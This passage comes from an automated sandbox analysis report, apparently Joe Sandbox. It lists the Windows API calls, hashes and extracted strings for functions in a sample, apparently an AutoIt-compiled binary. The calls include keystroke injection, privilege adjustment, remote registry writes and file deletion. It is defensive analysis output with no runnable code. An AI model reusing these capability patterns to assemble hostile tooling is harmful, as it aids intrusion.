                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction Fuzzy Hash: E9B0927644020C77CE012A82FC02A493B199B45764F408020FB0C18162E673A6A49AA9
                            APIs
                            • GetLastError.KERNEL32(00000002,00000000), ref: 00DAD1FF
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: 19dd120714b0ab5f830b1867ca8d88a3e26a62ab2d5ef3b006863d323ec3c307
                            • Instruction ID: a5f3b1a832dae9b4dadf4bc3e06dbdb6f41dcbad31f45e6254d8be9dcde2799a
                            • Opcode Fuzzy Hash: 19dd120714b0ab5f830b1867ca8d88a3e26a62ab2d5ef3b006863d323ec3c307
                            • Instruction Fuzzy Hash: 8A714E346043018FCB14EF68D491A6EB7E5EF8A314F04492DF8969B7A2DB30E945CB72
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 00993DB9
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: b8449012ada40eefd0da39224076ae01429e843d0a252d18a65e312f564b1980
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: A8E0E67494010EDFDB00DFB8D54969E7BB4EF04301F104161FD01D2680DA309E508A62
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00DCCB37
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DCCB95
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DCCBD6
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DCCC00
                            • SendMessageW.USER32 ref: 00DCCC29
                            • _wcsncpy.LIBCMT ref: 00DCCC95
                            • GetKeyState.USER32(00000011), ref: 00DCCCB6
                            • GetKeyState.USER32(00000009), ref: 00DCCCC3
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DCCCD9
                            • GetKeyState.USER32(00000010), ref: 00DCCCE3
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DCCD0C
                            • SendMessageW.USER32 ref: 00DCCD33
                            • SendMessageW.USER32(?,00001030,?,00DCB348), ref: 00DCCE37
                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00DCCE4D
                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DCCE60
                            • SetCapture.USER32(?), ref: 00DCCE69
                            • ClientToScreen.USER32(?,?), ref: 00DCCECE
                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DCCEDB
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DCCEF5
                            • ReleaseCapture.USER32(?,?,?), ref: 00DCCF00
                            • GetCursorPos.USER32(?), ref: 00DCCF3A
                            • ScreenToClient.USER32(?,?), ref: 00DCCF47
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DCCFA3
                            • SendMessageW.USER32 ref: 00DCCFD1
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DCD00E
                            • SendMessageW.USER32 ref: 00DCD03D
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DCD05E
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DCD06D
                            • GetCursorPos.USER32(?), ref: 00DCD08D
                            • ScreenToClient.USER32(?,?), ref: 00DCD09A
                            • GetParent.USER32(?), ref: 00DCD0BA
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DCD123
                            • SendMessageW.USER32 ref: 00DCD154
                            • ClientToScreen.USER32(?,?), ref: 00DCD1B2
                            • TrackPopupMenuEx.USER32 ref: 00DCD1E2
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DCD20C
                            • SendMessageW.USER32 ref: 00DCD22F
                            • ClientToScreen.USER32(?,?), ref: 00DCD281
                            • TrackPopupMenuEx.USER32 ref: 00DCD2B5
                              • Part of subcall function 00D425DB: GetWindowLongW.USER32(?,000000EB), ref: 00D425EC
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DCD351
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F$pb
                            • API String ID: 3977979337-96320988
                            • Opcode ID: d3860fbe0ceff8e028b9e1c98e01bfc97559b10f182eae0d691b133202ac27d8
                            • Instruction ID: 2a848b4894f5de87fbdb8feb0dbc1555a288eefcceabf55d16c78da422a7413e
                            • Opcode Fuzzy Hash: d3860fbe0ceff8e028b9e1c98e01bfc97559b10f182eae0d691b133202ac27d8
                            • Instruction Fuzzy Hash: 07427974214342AFDB25CF64C845FAABBE6EF49310F181A2DF6A9D72A0C731D844DB61
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove$_memset
                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                            • API String ID: 1357608183-1798697756
                            • Opcode ID: a0020e64f75c84fb8e53cf723774e346de71642efd852672189ab77d65447e9d
                            • Instruction ID: 847409002247402327f3dbb919206f98b7e546c0044b24f51aebccd66461101f
                            • Opcode Fuzzy Hash: a0020e64f75c84fb8e53cf723774e346de71642efd852672189ab77d65447e9d
                            • Instruction Fuzzy Hash: 3B939275A00215DBDF24CF98D881BBDB7B1FF48310F29816AED55AB291E7709E81CB60
                            APIs
                            • GetForegroundWindow.USER32 ref: 00D448DF
                            • FindWindowW.USER32 ref: 00D7D665
                            • IsIconic.USER32(?), ref: 00D7D66E
                            • ShowWindow.USER32(?,00000009), ref: 00D7D67B
                            • SetForegroundWindow.USER32(?), ref: 00D7D685
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D7D69B
                            • GetCurrentThreadId.KERNEL32 ref: 00D7D6A2
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7D6AE
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D7D6BF
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D7D6C7
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00D7D6CF
                            • SetForegroundWindow.USER32(?), ref: 00D7D6D2
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7D6E7
                            • keybd_event.USER32 ref: 00D7D6F2
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7D6FC
                            • keybd_event.USER32 ref: 00D7D701
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7D70A
                            • keybd_event.USER32 ref: 00D7D70F
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7D719
                            • keybd_event.USER32 ref: 00D7D71E
                            • SetForegroundWindow.USER32(?), ref: 00D7D721
                            • AttachThreadInput.USER32(?,?,00000000), ref: 00D7D748
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 4125248594-2988720461
                            • Opcode ID: 5cbc924bcea3ecf94a465aa1bb26e76e694afb07f8ec6363505317e7a7b1e4b1
                            • Instruction ID: ac79a639494c5fbd9869ca917a555c40c9e38206ee69b9b61c87051ccb665423
                            • Opcode Fuzzy Hash: 5cbc924bcea3ecf94a465aa1bb26e76e694afb07f8ec6363505317e7a7b1e4b1
                            • Instruction Fuzzy Hash: D1319571A403197BEB205B618C49FBF3E6EEF44B50F144025FA05EA2D1D6B05C01AAB0
                            APIs
                              • Part of subcall function 00D987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9882B
                              • Part of subcall function 00D987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D98858
                              • Part of subcall function 00D987E1: GetLastError.KERNEL32 ref: 00D98865
                            • _memset.LIBCMT ref: 00D98353
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00D983A5
                            • CloseHandle.KERNEL32(?), ref: 00D983B6
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D983CD
                            • GetProcessWindowStation.USER32 ref: 00D983E6
                            • SetProcessWindowStation.USER32 ref: 00D983F0
                            • OpenDesktopW.USER32 ref: 00D9840A
                              • Part of subcall function 00D981CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D98309), ref: 00D981E0
                              • Part of subcall function 00D981CB: CloseHandle.KERNEL32(?), ref: 00D981F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                            • String ID: $default$winsta0
                            • API String ID: 2063423040-1027155976
                            • Opcode ID: 15b1b96f1d751bdd1e18bbca41a10ee5236632db06038984de85f151b3874c37
                            • Instruction ID: e9cba85d4ed76ff0ad1307bd42346519107c5253c3201f3166f9af44f80bd827
                            • Opcode Fuzzy Hash: 15b1b96f1d751bdd1e18bbca41a10ee5236632db06038984de85f151b3874c37
                            • Instruction Fuzzy Hash: 8D8158B190020AAFDF519FA4CC45EFEBBB9EF05704F184169F914A6261DB318E19EB70
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 00DAC78D
                            • FindClose.KERNEL32(00000000), ref: 00DAC7E1
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DAC806
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DAC81D
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DAC844
                            • __swprintf.LIBCMT ref: 00DAC890
                            • __swprintf.LIBCMT ref: 00DAC8D3
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • __swprintf.LIBCMT ref: 00DAC927
                              • Part of subcall function 00D63698: __woutput_l.LIBCMT ref: 00D636F1
                            • __swprintf.LIBCMT ref: 00DAC975
                              • Part of subcall function 00D63698: __flsbuf.LIBCMT ref: 00D63713
                              • Part of subcall function 00D63698: __flsbuf.LIBCMT ref: 00D6372B
                            • __swprintf.LIBCMT ref: 00DAC9C4
                            • __swprintf.LIBCMT ref: 00DACA13
                            • __swprintf.LIBCMT ref: 00DACA62
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                            • API String ID: 3953360268-2428617273
                            • Opcode ID: 3a6741976b8cdbc2932910501df2ff0d0efcd046953df03d1a9e6a6731d83d89
                            • Instruction ID: ed060481759585c8a829a4227af3cebebf37285556104bf4b08f7f4fa6259a3a
                            • Opcode Fuzzy Hash: 3a6741976b8cdbc2932910501df2ff0d0efcd046953df03d1a9e6a6731d83d89
                            • Instruction Fuzzy Hash: 76A10AB1418345ABC710EBA5C896DAFB7ECFF99700F400929F595C6192EB35DA08CB72
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00DAEFB6
                            • _wcscmp.LIBCMT ref: 00DAEFCB
                            • _wcscmp.LIBCMT ref: 00DAEFE2
                            • GetFileAttributesW.KERNEL32(?), ref: 00DAEFF4
                            • SetFileAttributesW.KERNEL32(?,?), ref: 00DAF00E
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00DAF026
                            • FindClose.KERNEL32(00000000), ref: 00DAF031
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00DAF04D
                            • _wcscmp.LIBCMT ref: 00DAF074
                            • _wcscmp.LIBCMT ref: 00DAF08B
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DAF09D
                            • SetCurrentDirectoryW.KERNEL32(00DF8920), ref: 00DAF0BB
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DAF0C5
                            • FindClose.KERNEL32(00000000), ref: 00DAF0D2
                            • FindClose.KERNEL32(00000000), ref: 00DAF0E4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            • API String ID: 1803514871-438819550
                            • Opcode ID: 1a72f560748e4bf359fd822e21fdf9f19a7068fcee162b7c33da4fe797f5dc01
                            • Instruction ID: f63b1ebd5373a50a319030432f8b1b50e2f4e5209dff8d80e15796c8ade0a53b
                            • Opcode Fuzzy Hash: 1a72f560748e4bf359fd822e21fdf9f19a7068fcee162b7c33da4fe797f5dc01
                            • Instruction Fuzzy Hash: 9731BF3250121A6EDB149BA4DC48FEEB7ADDF4A360F1441B5E804E31A1DB70DA44CA79
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC0953
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00DCF910,00000000,?,00000000,?,?), ref: 00DC09C1
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC0A09
                            • RegSetValueExW.ADVAPI32 ref: 00DC0A92
                            • RegCloseKey.ADVAPI32(?), ref: 00DC0DB2
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC0DBF
                            Strings
                            Similarity
                            • API ID: Close$ConnectCreateRegistryValue
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 536824911-966354055
                            • Opcode ID: 26a76c045516059306466d808c75db802c68201650924e432c769f9ded38ade3
                            • Instruction ID: b0bb29b8f1af00282156bd8fbaf58136e8ebf6549a65278a46c8c7eaa5283c25
                            • Opcode Fuzzy Hash: 26a76c045516059306466d808c75db802c68201650924e432c769f9ded38ade3
                            • Instruction Fuzzy Hash: 02024A756006029FCB14EF19C891E2ABBE5FF89710F04855DF88A9B362CB31EC45CBA1
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00DAF113
                            • _wcscmp.LIBCMT ref: 00DAF128
                            • _wcscmp.LIBCMT ref: 00DAF13F
                              • Part of subcall function 00DA4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DA43A0
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00DAF16E
                            • FindClose.KERNEL32(00000000), ref: 00DAF179
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00DAF195
                            • _wcscmp.LIBCMT ref: 00DAF1BC
                            • _wcscmp.LIBCMT ref: 00DAF1D3
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DAF1E5
                            • SetCurrentDirectoryW.KERNEL32(00DF8920), ref: 00DAF203
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DAF20D
                            • FindClose.KERNEL32(00000000), ref: 00DAF21A
                            • FindClose.KERNEL32(00000000), ref: 00DAF22C
                            Strings
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            • API String ID: 1824444939-438819550
                            • Opcode ID: 98f320b2865f3ca57fbfd5526ea8af2fba29b87d65127dfe6738bb6199baf138
                            • Instruction ID: ee5f4bccf3418d830c66d6286898492e34bc15dd51e1efe713d84791692debdd
                            • Opcode Fuzzy Hash: 98f320b2865f3ca57fbfd5526ea8af2fba29b87d65127dfe6738bb6199baf138
                            • Instruction Fuzzy Hash: 7231B33650021A7ADF10ABA4EC49FEEB7ADDF46360F1441B5E800E31A1DB70DE49CA79
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DAA20F
                            • __swprintf.LIBCMT ref: 00DAA231
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DAA26E
                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DAA293
                            • _memset.LIBCMT ref: 00DAA2B2
                            • _wcsncpy.LIBCMT ref: 00DAA2EE
                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00DAA323
                            • CloseHandle.KERNEL32(00000000), ref: 00DAA32E
                            • RemoveDirectoryW.KERNEL32(?), ref: 00DAA337
                            • CloseHandle.KERNEL32(00000000), ref: 00DAA341
                            Strings
                            Similarity
                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                            • String ID: :$\$\??\%s
                            • API String ID: 2733774712-3457252023
                            • Opcode ID: d6ad04d4d02efc281951a71d3742f07113fc55b631aced3e9adf2138b59894af
                            • Instruction ID: d6d60b28c4c349b1000e940ecc31be1944b12ffeb394c424b35f37a5d5ab755d
                            • Opcode Fuzzy Hash: d6ad04d4d02efc281951a71d3742f07113fc55b631aced3e9adf2138b59894af
                            • Instruction Fuzzy Hash: 7F31BEB190020AABDB219FA4DC49FEB77BDEF89740F1441B6FA08D2160EB749644CB35
                            Strings
                            Similarity
                            • API ID:
                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                            • API String ID: 0-4052911093
                            • Opcode ID: 79b8a3e60c28d985a84a07dfdcaef5a86bc1e5327c38e3521b225f27713e7269
                            • Instruction ID: 344f8afc3c40277af9e3fa7822716f5084cfd1b7ce4bb604ec18a1a204ce1ba8
                            • Opcode Fuzzy Hash: 79b8a3e60c28d985a84a07dfdcaef5a86bc1e5327c38e3521b225f27713e7269
                            • Instruction Fuzzy Hash: A9726E75E0021A9BDF14DF58C8807AEB7B5FF48311F54816AED49EB290EB70D985CBA0
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00DA0097
                            • SetKeyboardState.USER32(?), ref: 00DA0102
                            • GetAsyncKeyState.USER32 ref: 00DA0122
                            • GetKeyState.USER32(000000A0), ref: 00DA0139
                            • GetAsyncKeyState.USER32 ref: 00DA0168
                            • GetKeyState.USER32(000000A1), ref: 00DA0179
                            • GetAsyncKeyState.USER32 ref: 00DA01A5
                            • GetKeyState.USER32(00000011), ref: 00DA01B3
                            • GetAsyncKeyState.USER32 ref: 00DA01DC
                            • GetKeyState.USER32(00000012), ref: 00DA01EA
                            • GetAsyncKeyState.USER32 ref: 00DA0213
                            • GetKeyState.USER32(0000005B), ref: 00DA0221
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: e7b0791633a7e4e20c4ab95219da09a41e8539a3982b5ce91e688d8f1ea7960e
                            • Instruction ID: 4ff9430ee2b95991f888095198a9219b78e9b0b9dd48c92afb2113123d192766
                            • Opcode Fuzzy Hash: e7b0791633a7e4e20c4ab95219da09a41e8539a3982b5ce91e688d8f1ea7960e
                            • Instruction Fuzzy Hash: D451D62090478829FB35DBA088557EABFB49F03380F0C459ED9C25B5C2DAA49B8CC776
                            APIs
                              • Part of subcall function 00DC0E1A: CharUpperBuffW.USER32(?,?), ref: 00DC0E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC04AC
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00DC054B
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DC05E3
                            • RegCloseKey.ADVAPI32(000000FE), ref: 00DC0822
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC082F
                            Similarity
                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                            • String ID:
                            • API String ID: 1240663315-0
                            • Opcode ID: 89138de237bbbcd5b5c9d335d7ed3a4d8ec9d2c2464fbe253ddabb4a614226a8
                            • Instruction ID: 01c2f6a2caf29b5d7f2c991321068f6403d2e00fee0b1377fd226fc5ef599ec3
                            • Opcode Fuzzy Hash: 89138de237bbbcd5b5c9d335d7ed3a4d8ec9d2c2464fbe253ddabb4a614226a8
                            • Instruction Fuzzy Hash: D9E15D71204211EFCB14DF28C891E6BBBE5EF89714F04896DF84ADB261DB31E905CBA1
                            APIs
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            • Opcode ID: 77624620c4ef1affb8dc60064bcb7934c659fa148e13fe279723f0f369ccc86e
                            • Instruction ID: 63fa77aff7c5a2cafab4828f446ca8506091ee071dde6089bd1794edec1aeac3
                            • Opcode Fuzzy Hash: 77624620c4ef1affb8dc60064bcb7934c659fa148e13fe279723f0f369ccc86e
                            • Instruction Fuzzy Hash: EB217E356003129FDB10AF29DC19FAABBA9EF05751F148026F946DB3A2DB30AC418B74
                            APIs
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                              • Part of subcall function 00DA4A31: GetFileAttributesW.KERNEL32(?,00DA370B), ref: 00DA4A32
                            • FindFirstFileW.KERNEL32(?,?), ref: 00DA38A3
                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00DA394B
                            • MoveFileW.KERNEL32 ref: 00DA395E
                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00DA397B
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DA399D
                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00DA39B9
                            Strings
                            Similarity
                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                            • String ID: \*.*
                            • API String ID: 4002782344-1173974218
                            • Opcode ID: 3e4c3b379688f77e995ec920cb241b7f3e9a96f5be93c7af246ab0ffa1690d25
                            • Instruction ID: 40ddafcc338265cb27e354e311389cb017526383f510fb922494d6d89b11d63d
                            • Opcode Fuzzy Hash: 3e4c3b379688f77e995ec920cb241b7f3e9a96f5be93c7af246ab0ffa1690d25
                            • Instruction Fuzzy Hash: 3F51583180514DABCF05EBA0DA929EEB77AEF16300F644169F406B6192EB716F09CF71
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00DAF440
                            • Sleep.KERNEL32(0000000A), ref: 00DAF470
                            • _wcscmp.LIBCMT ref: 00DAF484
                            • _wcscmp.LIBCMT ref: 00DAF49F
                            • FindNextFileW.KERNEL32(?,?), ref: 00DAF53D
                            • FindClose.KERNEL32(00000000), ref: 00DAF553
                            Strings
                            Similarity
                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                            • String ID: *.*
                            • API String ID: 713712311-438819550
                            • Opcode ID: 6eb6d40b2b3788d3bfb9e613c7fc5b55b73edecc483298ddb64c105df45c3e5b
                            • Instruction ID: 94d12f047414fecba0cf96b7c8a6e86865f2d8d6d04a1d996750e932dc562d02
                            • Opcode Fuzzy Hash: 6eb6d40b2b3788d3bfb9e613c7fc5b55b73edecc483298ddb64c105df45c3e5b
                            • Instruction Fuzzy Hash: 46412871D0021AAFCF14EFA4D855AEEBBB5EF0A310F1445A6E815A3291EB309A44CF70
                            APIs
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: fd164bfe3515b8a399a35059d9173672b9c6e2fb26d26b4971fc924a186c32b7
                            • Instruction ID: 8ac31b172b4e68d58fa3d95c0642ebc39f31b23ede460aef310bb952c2d5312b
                            • Opcode Fuzzy Hash: fd164bfe3515b8a399a35059d9173672b9c6e2fb26d26b4971fc924a186c32b7
                            • Instruction Fuzzy Hash: A4129A70A00609DFDF04DFA5E991AAEBBF5FF48310F108529E846E7255EB36A914CB70
                            APIs
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                              • Part of subcall function 00DA4A31: GetFileAttributesW.KERNEL32(?,00DA370B), ref: 00DA4A32
